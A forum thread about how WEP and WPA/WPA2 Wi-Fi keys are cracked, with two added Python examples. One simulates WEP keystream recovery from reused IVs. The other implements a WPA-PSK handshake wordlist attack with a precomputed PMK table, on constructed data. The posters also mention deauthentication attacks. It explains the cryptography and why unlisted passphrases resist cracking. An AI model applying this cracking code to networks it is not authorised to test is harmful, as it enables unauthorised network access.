Hello davidjnr, and welcome to remote-exploit!

I like your enthusiasm.
To be honest, I've always been interested in the encryption side of things from watching Sneakers lol and World War 2 stories of the Enigma machine and our Bletchley Park.
Let me start by saying that there is more than one way to skin a cat. But the cold harsh reality is that if your passphrase is NOT in your dictionary...you can't brute force it....PERIOD...forget what everyone else has told you..or what you have heard..they're wrong. Plain and simple. I have 2 videos on cracking WPA/WPA2..one basic..and one where I use airolib and MySQL databases to precompute a table of hashes with your ESSID.
The basic one is found here...
Let me make this as clear as possible....
If your passphrase is david123 and you have 100,000 gigabytes or 1,000,000,000 petabytes...and your passphrase is NOT IN THAT DATABASE or DICTIONARY..IT WILL FAIL!!! You can have every word in the whole English or world language..and if that passphrase is NOT in that database or wordlist..it won't work.
So are you saying that to some extent WPA2 is a good encryption method if you use a passkey like 123qerdfvwsthq34rtw/73erfgvc? Dependent upon the length, it is still possible to create your own wordlist of words and numbers; dependent upon the length of the passkey it's still possible, but it would take longer to crack. Also, loads of hard disk drive space needed, and CPU! But also, if it's not in the dictionary file then it cannot be cracked.
In most people's cases the router key will not change from the factory setting and is therefore more known, so I suppose you could backtrack your wordlist from there on the router passkey's length.
Yes..a precomputed hash table database WILL SPEED UP THE PROCESS GREATLY...but if it's not in that database..you're S.O.L. my friend.
My suggestion to you davidjnr, is to master cracking WEP and WPA/WPA2
BEFORE you tread the waters of -=Xploiting=-. Metasploit..Nessus..nmap..are all great tools..but if you can't break the AP..then you don't need the tools, because you won't be able to use them until you crack the AP.
I've cracked my own router at home. I don't really want to mess with the router at work just in case I do break it; I have switched off the wireless element at work to be on the safe side for now.
My understanding of WEP is that in order to create the traffic you are sending, say, a block of data, i.e. abcdefghijklmnopqrstuvwxyz, the same data round and round in circles, but every time it creates a different encryption header (IV) at the beginning of the abc etc. data stream, and it's this variation in the encryption header that you can then use, via a mathematical formula, to obtain the encryption key with a high certainty of probability? I just find this fascinating, as if I'm back in time at Bletchley Park in their shoes cracking troop movements etc. I would have thought that the router would have blocked out this type of attack?
Cracking WPA2 is only by collecting the security handshake between client and router. I used in this example my wireless radio by deauth attack, but then I just made my own passphrase list of 5 words with my passkey in there to see if it worked, to save time.
I understand that the encryption of AES is not crackable just yet, but the TKIP can be?
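Added example (not code from either poster or from aircrack-ng) for the WEP question above: what the "same data round and round with a different IV" actually does on the wire. WEP prepends the 3-byte IV, sent in the clear, to the secret key and uses the result as the RC4 key for that one frame. Because every ARP frame starts with the same LLC/SNAP header (AA AA 03 00 00 00 08 06), XORing a captured frame with that known plaintext gives the first keystream bytes for its IV. Those (IV, keystream) pairs are the input to the statistical key-recovery step (FMS/KoreK/PTW) that aircrack-ng runs; that step is not implemented here, and the CRC-32 ICV is left out. The WEP key, the replayed ARP body and the capture are constructed for the example.

```python
import random

# Known plaintext: LLC/SNAP header that starts every ARP frame (real value).
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 key scheduling (KSA) followed by n bytes of keystream (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear, then RC4(IV || key) XOR plaintext.
    The per-frame RC4 key is simply the IV glued in front of the secret key."""
    ks = rc4_keystream(iv + wep_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def simulate_arp_replay(wep_key: bytes, arp_frame: bytes, n_frames: int, seed: int = 1):
    """Constructed capture: the AP re-encrypts the replayed ARP request under a
    fresh random IV each time. With only 2^24 IVs, repeats eventually appear."""
    rnd = random.Random(seed)
    return [wep_encrypt(wep_key, rnd.getrandbits(24).to_bytes(3, "big"), arp_frame)
            for _ in range(n_frames)]


def harvest_keystreams(frames, known_prefix: bytes = LLC_SNAP_ARP) -> dict:
    """What the replay gives the attacker: for every IV seen, XOR the ciphertext
    with the plaintext everyone knows and you hold the first keystream bytes
    for that IV. Returns {iv: keystream_prefix}."""
    table = {}
    for frame in frames:
        iv, ct = frame[:3], frame[3:3 + len(known_prefix)]
        table[iv] = bytes(c ^ p for c, p in zip(ct, known_prefix))
    return table


def decrypt_reused_iv(known_frame: bytes, known_plaintext: bytes, other_frame: bytes) -> bytes:
    """Two frames under the same IV share the whole keystream, so the known
    plaintext of one decrypts the other (up to the known length)."""
    if known_frame[:3] != other_frame[:3]:
        raise ValueError("IVs differ; no keystream reuse")
    ks = bytes(c ^ p for c, p in zip(known_frame[3:], known_plaintext))
    return bytes(c ^ k for c, k in zip(other_frame[3:], ks))


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"                 # constructed 40-bit WEP key
    arp = LLC_SNAP_ARP + bytes(20)                # constructed ARP body
    table = harvest_keystreams(simulate_arp_replay(key, arp, 200))
    print(len(table), "IVs with known keystream bytes")
    iv = b"\x00\x00\x01"
    a = wep_encrypt(key, iv, arp)
    b = wep_encrypt(key, iv, b"secret data for the example")
    print(decrypt_reused_iv(a, arp, b))
```

The router does not block this because nothing in WEP ties the IV to the key in a safe way: the IV is public, the key is static, and the replay only asks the AP to do what it always does.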
Focus on that..and use Nessus instead of nmap. I prefer Nessus over nmap any day.
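Added example (not code from either poster, airolib-ng or aircrack-ng) for the dictionary and precomputed-table points made throughout the thread: why a WPA/WPA2-PSK handshake can only be "cracked" against a wordlist, and why a precomputed table is tied to one ESSID. The chain is PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds), PTK = PRF-512(PMK, nonces, MACs), and the MIC on handshake message 2 is HMAC-SHA1 keyed with the first 16 PTK bytes (HMAC-MD5 for TKIP). The check is a comparison against a captured MIC, so a passphrase that is not in the list is never tested. The ESSID, the MACs, the nonces and the message-2 frame are constructed here to stand in for a capture.

```python
import hashlib
import hmac
import random

ESSID = b"linksys"       # constructed ESSID
PASSPHRASE = "david123"  # the weak passphrase used as the illustration above
MIC_OFFSET = 81          # MIC field offset in an EAPOL-Key frame (802.1X header + descriptor fields)


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    The ESSID is the salt, so a PMK table only serves the ESSID it was built for."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes (KCK) key the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 2 (CCMP/AES): HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_handshake(passphrase: str, essid: bytes, seed: int = 7) -> dict:
    """Stand-in for a captured 4-way handshake after deauth + reconnect:
    AP/client MACs, both nonces and message 2 carrying a valid MIC (constructed)."""
    rnd = random.Random(seed)
    aa = bytes(rnd.getrandbits(8) for _ in range(6))      # AP (authenticator) MAC
    spa = bytes(rnd.getrandbits(8) for _ in range(6))     # client (supplicant) MAC
    anonce = bytes(rnd.getrandbits(8) for _ in range(32))
    snonce = bytes(rnd.getrandbits(8) for _ in range(32))
    key_data = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big")  # type, key info, key len, replay ctr
            + snonce + bytes(16) + bytes(8) + bytes(8)                      # nonce, IV, RSC, ID
            + bytes(16) + len(key_data).to_bytes(2, "big") + key_data)     # MIC placeholder, key data
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, essid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"essid": essid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": mic}


def build_pmk_table(essid: bytes, wordlist) -> dict:
    """airolib-ng style: do the slow PBKDF2 step once per (ESSID, word)."""
    return {word: pmk_from_passphrase(word, essid) for word in wordlist}


def crack_handshake(hs: dict, wordlist, pmk_table: dict = None):
    """For each candidate: PMK -> PTK -> KCK -> MIC, compared with the captured MIC.
    Returns the passphrase if it is in the list, otherwise None."""
    for word in wordlist:
        if pmk_table and word in pmk_table:
            pmk = pmk_table[word]            # table hit: PBKDF2 skipped
        else:
            pmk = pmk_from_passphrase(word, hs["essid"])
        kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return word
    return None


if __name__ == "__main__":
    hs = build_handshake(PASSPHRASE, ESSID)
    words = ["password", "123qerdfvwsthq34rtw/73erfgvc", "linksys", "david123"]
    print(crack_handshake(hs, words))                        # david123
    print(crack_handshake(hs, words[:-1]))                   # None: not in the list
    print(crack_handshake(hs, words, build_pmk_table(ESSID, words)))  # david123, from the table
```

The table only removes the PBKDF2 cost; the PRF and MIC steps still run per candidate, and a table built for "linksys" is useless against "netgear" because the PMKs differ.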